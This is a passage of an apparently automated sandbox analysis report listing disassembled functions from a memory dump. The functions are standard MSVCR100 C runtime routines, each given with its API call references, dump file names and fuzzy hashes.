                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC970D
                                                                                                            • Part of subcall function 6FDC9684: _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,00000000), ref: 6FDC971B
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC9742
                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC975A
                                                                                                            • Part of subcall function 6FDC9684: GetLastError.KERNEL32(?,00000000), ref: 6FDC977D
                                                                                                            • Part of subcall function 6FDC9684: ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,00000000), ref: 6FDC9795
                                                                                                            • Part of subcall function 6FDB865E: memset.MSVCR100(?,00000000,0000000C,6FDB869C), ref: 6FDB8663
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6BFC
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6C15
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6C24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWaitmallocmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1733554963-0
                                                                                                          • Opcode ID: a3ff5149fae59c3bd0529b5120d2265e2dbee2d2dde02d522d4a8ee34448ba4c
                                                                                                          • Instruction ID: 49df285e796fd2bc83dc40c3ae05f0019782dbe72f73f26f6c75434190e4dd86
                                                                                                          • Opcode Fuzzy Hash: a3ff5149fae59c3bd0529b5120d2265e2dbee2d2dde02d522d4a8ee34448ba4c
                                                                                                          • Instruction Fuzzy Hash: 054160B15087429FD740CF64C981B5ABBE8FF8A765F100A2DF5589B290DB34F944CBA2
                                                                                                          Function 6FD96921 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_gmtime64_s$_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezonememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3362392949-0
                                                                                                          • Opcode ID: afdbfc881f2edbf4ece00915062a56fbc11af0d6434422701ced93e7e2a06166
                                                                                                          • Instruction ID: 65d8c9a5ed6f175e79f686cebd39051d6313cd8b55a8fdef70cf3610f67a3e70
                                                                                                          • Opcode Fuzzy Hash: afdbfc881f2edbf4ece00915062a56fbc11af0d6434422701ced93e7e2a06166
                                                                                                          • Instruction Fuzzy Hash: 65219C76A00716EADF44DFF9CC909DEB7F89F86254B104167D411EB184EB32FA4487A1
                                                                                                          Function 6FDCCD26 Relevance: 7.6, APIs: 5, Instructions: 83stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD3C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD46
                                                                                                          • _errno.MSVCR100(?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCD68
                                                                                                          • strlen.MSVCR100(?,?,?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?,?,000000A3), ref: 6FDCCDC1
                                                                                                          • memmove.MSVCR100(?,?,00000001,?,?,?,00000016,?,6FE001F4,00000000,?,?,0000002D,?,?,?), ref: 6FDCCDCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4167440682-0
                                                                                                          • Opcode ID: c53472401e32b857136ec1ca63aa71b4d39a73b0ea270e84188dedf9f11b4288
                                                                                                          • Instruction ID: 11887ce3431324ff2e5bf15860c03949537fbcce1c561fde74736510031a2fd5
                                                                                                          • Opcode Fuzzy Hash: c53472401e32b857136ec1ca63aa71b4d39a73b0ea270e84188dedf9f11b4288
                                                                                                          • Instruction Fuzzy Hash: 652137757083D1DEE3A25B2888007953FAD9F47754F18859AEA814F241E670B803C7B3
                                                                                                          Function 6FDD8554 Relevance: 7.6, APIs: 5, Instructions: 82COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcscpy_s.MSVCR100(6FE28408,0000000E,6FDB3048,6FE28448,00000012,00000000,?,6FDD8707,?,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF), ref: 6FDD8591
                                                                                                          • _ultow_s.MSVCR100(00000000,6FE28408,0000000E,00000020), ref: 6FDD85DE
                                                                                                          • wcscat_s.MSVCR100(6FE28408,0000000E,6FDB3014), ref: 6FDD85F1
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD8602
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson_ultow_swcscat_swcscpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1489244896-0
                                                                                                          • Opcode ID: deabe3b5ea366a6547d7470f4334d3d9579793d2cb108ff3aa04bab5ee5a155d
                                                                                                          • Instruction ID: 779dfc78ebaab56be1fa4318a1cd3feb9cece65a0fde1f2257e1c89139dc49c1
                                                                                                          • Opcode Fuzzy Hash: deabe3b5ea366a6547d7470f4334d3d9579793d2cb108ff3aa04bab5ee5a155d
                                                                                                          • Instruction Fuzzy Hash: EF113A62A4C30CE7E6970B399C46F6B37ACDF81768F446016F9189F1C1E624FA4183B1
                                                                                                          Function 6FDFEEB3 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000007,00000007,?,6FDB0814), ref: 6FDFEEDD
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEEE9
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00000000,?,00000007,00000007,?,6FDB0814), ref: 6FDFEF03
                                                                                                            • Part of subcall function 6FD92144: _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,7650DFF0), ref: 6FD9216B
                                                                                                            • Part of subcall function 6FD92144: free.MSVCR100(00000000,00000000,00000000,7650DFF0), ref: 6FD921D2
                                                                                                          • free.MSVCR100(00000000,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEF21
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(00000000,?,00000000,?,00000007,00000007,?,6FDB0814,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FDFEF42
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$ByteCharMultiWide$FreeHeap_calloc_crt_mbschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1824706361-0
                                                                                                          • Opcode ID: c7ebc336a6d700fb094a8096529ac2b64b5b61f7baf0237e1cb75a17aaeeeb48
                                                                                                          • Instruction ID: 506b93f1aa2eea9a42569ce3447a9d2e63bcf4e0b966bcc983c92e8d9b2f0e0e
                                                                                                          • Opcode Fuzzy Hash: c7ebc336a6d700fb094a8096529ac2b64b5b61f7baf0237e1cb75a17aaeeeb48
                                                                                                          • Instruction Fuzzy Hash: DC11607291B626FA9B5187A69D44CCF7FACEF067747210256F028D3190EB30B981C6A0
                                                                                                          Function 6FDD6894 Relevance: 7.6, APIs: 5, Instructions: 76stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • strcpy_s.MSVCR100(6FE283D0,0000000E,6FDB3024,6FE283F4,00000012,00000000,?,6FDD6A3B,?,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF), ref: 6FDD68D1
                                                                                                          • _ultoa_s.MSVCR100(00000000,6FE283D2,6FE283D0,00000020), ref: 6FDD6910
                                                                                                          • strcat_s.MSVCR100(6FE283D0,0000000E,6FD86E28), ref: 6FDD6923
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD6934
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invoke_watson_ultoa_sstrcat_sstrcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2909298754-0
                                                                                                          • Opcode ID: 0251c774d7530d4396d4635954778aaa969552267a7e4d59eeb1a81f400fdd5f
                                                                                                          • Instruction ID: cd3cf1c6610207cb904d85981e0cff2a861a3f2d82407b83808d4e3414aab747
                                                                                                          • Opcode Fuzzy Hash: 0251c774d7530d4396d4635954778aaa969552267a7e4d59eeb1a81f400fdd5f
                                                                                                          • Instruction Fuzzy Hash: D2113622A08384AEF7800B388C59F9F3F9DAF53354F054062F9549F2C1E620BD0583E1
                                                                                                          Function 6FDF8B00 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileType.KERNEL32(?,?,?,6FDF8C18,0000000C), ref: 6FDF8B34
                                                                                                          • GetLastError.KERNEL32(?,?,6FDF8C18,0000000C), ref: 6FDF8B3E
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,?,6FDF8C18,0000000C), ref: 6FDF8B45
                                                                                                          • _errno.MSVCR100(?,?,6FDF8C18,0000000C), ref: 6FDF8B75
                                                                                                          • __doserrno.MSVCR100(?,?,6FDF8C18,0000000C), ref: 6FDF8B80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastType__doserrno_dosmaperr_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 1019426309-0
                                                                                                          • Opcode ID: 7ea441bb4bfb9908664a3f3a1e182e0661275cbdf228a7eb087357a9b3f7c2e0
                                                                                                          • Instruction ID: 8ccda24b9dfa316fa1c32a8417383904c13e83670c11fd831c2e266843176316
                                                                                                          • Opcode Fuzzy Hash: 7ea441bb4bfb9908664a3f3a1e182e0661275cbdf228a7eb087357a9b3f7c2e0
                                                                                                          • Instruction Fuzzy Hash: E821FFB154A705EADB818F6AC841B9CBB60AF42328F598745D4708F1D2DB74B282DF92
                                                                                                          Function 6FDC7DCC Relevance: 7.6, APIs: 5, Instructions: 70synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000010,6FDC7D43), ref: 6FDC7DE9
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6FDC7E06
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC7E86
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6FDC7E8F
                                                                                                          • ??3@YAXPAX@Z.MSVCR100(?), ref: 6FDC7E92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle$??3@AcquireConcurrency@@Lock@details@ObjectReaderSingleWaitWrite@_Writer
                                                                                                          • String ID:
                                                                                                          • API String ID: 4257580306-0
                                                                                                          • Opcode ID: a61ce23e61f05fc3be8b78e7781600136724023c0ba933286b59e901706715a6
                                                                                                          • Instruction ID: 31aa18243b30ad2c048fdf4de7d381cf01fe257d4a985e24afc785d2cd177786
                                                                                                          • Opcode Fuzzy Hash: a61ce23e61f05fc3be8b78e7781600136724023c0ba933286b59e901706715a6
                                                                                                          • Instruction Fuzzy Hash: 4421AE32900306DBDB81CF68C88166A77B8BF41320B154659E8649B2D0CB35FD02CBA1
                                                                                                          Function 6FDFA801 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA833
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA83E
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA853
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA86C
                                                                                                          • _errno.MSVCR100(6FDFA8F0,00000010), ref: 6FDFA8BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 0c976ea6db579e9b774d43a8e0bdf3c7b82a977da4f3fdfa8a103e1cefc31ac9
                                                                                                          • Instruction ID: 51c045ba05a296ecf47218cd7cfed0a739c1451dc51e645e2c44130fde5bcf1d
                                                                                                          • Opcode Fuzzy Hash: 0c976ea6db579e9b774d43a8e0bdf3c7b82a977da4f3fdfa8a103e1cefc31ac9
                                                                                                          • Instruction Fuzzy Hash: 90218471822749DAE7919F64D884F983760AF01364F524256D830AB2D1CBF8BA83CB61
                                                                                                          Function 6FDDAEDE Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime64_s_wasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3494016602-0
                                                                                                          • Opcode ID: 121e369f062a47d626d2658141d94f0f5d3c49d9dba26209718a8ec66ba2515d
                                                                                                          • Instruction ID: d8361547b5f578fe603a7cca9cf3a377ccec14206c2ce3812bb7065c86d3820b
                                                                                                          • Opcode Fuzzy Hash: 121e369f062a47d626d2658141d94f0f5d3c49d9dba26209718a8ec66ba2515d
                                                                                                          • Instruction Fuzzy Hash: 7011C6B1601314DBDB949FB8C800ADE77B4EF49728F04C2AAF801DB186DB70F54187A5
                                                                                                          Function 6FD90A97 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6FD90AB5
                                                                                                          • _errno.MSVCR100 ref: 6FDAC7B6
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC7C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1358483507-0
                                                                                                          • Opcode ID: 19f20282754476dda687c42c5f2b5a1534bbc8fcce3d886ff386d5ce08dc4b71
                                                                                                          • Instruction ID: cd2cca9df6ff3858c1fc8050a4b170b4a9f0e63c31b89804c41e0043f8742881
                                                                                                          • Opcode Fuzzy Hash: 19f20282754476dda687c42c5f2b5a1534bbc8fcce3d886ff386d5ce08dc4b71
                                                                                                          • Instruction Fuzzy Hash: 4411B276541355DBEBA04FA8D8443B936A1AB013B1F50525AF8619A2D0DB3AF84086E9
                                                                                                          Function 6FD90688 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FD90692
                                                                                                          • _isatty.MSVCR100(00000000,?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FD90698
                                                                                                          • __p__iob.MSVCR100(?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FDA8A2D
                                                                                                          • _malloc_crt.MSVCR100(00001000,?,?,?,?,6FD9094E,?,6FD90980,0000000C,6FD909B6,Function_00011614,?,?,00000000,?), ref: 6FDA8A71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob_fileno_isatty_malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 301265415-0
                                                                                                          • Opcode ID: 0a64a9428aae57c74d2c88c0d3adf96718c9e72284f6ba35ee302d4de9d5dc78
                                                                                                          • Instruction ID: 0a8d68335f32f7bf4cf6f903e64d1d52f78f472b477ac9a6c08f1b5100f8c805
                                                                                                          • Opcode Fuzzy Hash: 0a64a9428aae57c74d2c88c0d3adf96718c9e72284f6ba35ee302d4de9d5dc78
                                                                                                          • Instruction Fuzzy Hash: CD1170B290D742DED3A09FB9D885642B7E8EF553A4B10882AD5EAC7140F771F4808BA4
                                                                                                          Function 6FD925A4 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,6FD92640,00000008), ref: 6FD925C8
                                                                                                          • _lock_file.MSVCR100(?,?,6FD92640,00000008), ref: 6FD925D0
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                          • _lseek.MSVCR100(00000000,00000000,00000000,?,?,6FD92640,00000008), ref: 6FD9261D
                                                                                                          • _errno.MSVCR100(6FD92640,00000008), ref: 6FDA8E56
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92640,00000008), ref: 6FDA8E61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_invalid_parameter_noinfo_lock_lock_file_lseek_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 2790466172-0
                                                                                                          • Opcode ID: bda241c5c4c78a6b1d2aaf06866fba263034e2b109c15fb234ed166aaee21889
                                                                                                          • Instruction ID: 70749740c6f7114011b80a19c7ce113b7f7d3b8d0558aa977718f55a0c395ab3
                                                                                                          • Opcode Fuzzy Hash: bda241c5c4c78a6b1d2aaf06866fba263034e2b109c15fb234ed166aaee21889
                                                                                                          • Instruction Fuzzy Hash: B2110A72501B40DFE7945FB89C8196E3BA0EF4227DB19C35AE4798F5D0DB38BA418B21
                                                                                                          Function 6FD8BDC0 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FD8BE66
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94A7
                                                                                                            • Part of subcall function 6FD8BBE4: _lock.MSVCR100(00000001,6FD8BC30,00000010,6FD8BE02,6FD8BE40,0000000C), ref: 6FD8BBF9
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94B3
                                                                                                          • _errno.MSVCR100(6FD8BE40,0000000C), ref: 6FDA94C0
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE,6FD8BE40,0000000C), ref: 6FDA94D6
                                                                                                            • Part of subcall function 6FD8BCC7: _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6FD8BD91
                                                                                                            • Part of subcall function 6FD8BE5C: _unlock_file.MSVCR100(?,6FD8BE36), ref: 6FD8BE5F
                                                                                                          Memory Dump Source
